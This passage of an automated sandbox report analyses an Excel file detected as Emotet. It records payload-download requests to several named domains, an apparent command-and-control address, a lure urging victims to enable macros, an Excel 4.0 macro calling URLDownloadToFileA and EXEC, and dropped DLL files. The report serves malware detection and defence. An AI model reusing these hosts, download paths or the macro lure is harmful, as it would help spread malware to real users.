                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1215037206.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000004.00000002.1214540474.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982406822.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214943088.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214558959.0000000000256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000004.00000002.1214540474.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982406822.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214540936.0000000000124000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214558959.0000000000256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme.
                      Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoc
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214649654.0000000000305000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/
                      Source: regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/E&
                      Source: regsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/d
                      Source: regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214943088.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/
                      Source: regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/0
                      Source: regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/4
                      Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.co
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: learnviaonline.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017C8C InternetReadFile,4_2_0000000180017C8C
                      Source: global trafficHTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Found malicious Excel 4.0 Macro
                      Source: Datei_26744565.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: Datei_26744565.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Office process drops PE file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file
                      Found Excel 4.0 Macro with suspicious formulas
                      Source: Datei_26744565.xlsInitial sample: EXEC
                      Source: Datei_26744565.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\RrQZitdNyvCFEhe\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D212B03_2_000007FEF9D212B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25E013_2_000007FEF9D25E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25CAD3_2_000007FEF9D25CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D268503_2_000007FEF9D26850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2443C3_2_000007FEF9D2443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D253FB3_2_000007FEF9D253FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D24A703_2_000007FEF9D24A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002C00003_2_002C0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800264103_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025C303_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D583_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800165E43_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180011E5C3_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002C6C83_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002C2C83_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026F143_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800163203_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800013783_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018FE83_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ABE83_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800243F43_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800083F83_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800247FC3_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DBFC3_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001100C3_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180027C283_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002143C3_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001303C3_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A8403_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800038403_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B4443_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F0483_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AC4C3_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800100503_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800030503_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000445C3_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C85C3_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800034603_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029C6C3_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001586C3_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000406C3_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E06C3_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC703_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001447C3_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026C803_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C843_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160883_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800028883_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017C8C3_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FC8C3_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002D0983_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800154B83_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180011CCC3_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800064D03_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800180D43_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800054D83_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002CCE03_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800254E43_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800184E83_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800010E83_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E8F03_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A0F83_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800199003_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800119043_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F9083_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002490C3_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001890C3_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001D5103_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180003D183_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002191C3_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001D1283_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D12C3_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800149303_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085343_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CD443_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B9483_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000796C3_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800105903_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D943_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800091A83_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800171B83_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018DBC3_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800141C83_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B1D43_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023DDC3_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029DF03_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015DF43_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800011F43_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FE083_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180027E143_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B6183_2_000000018000B618
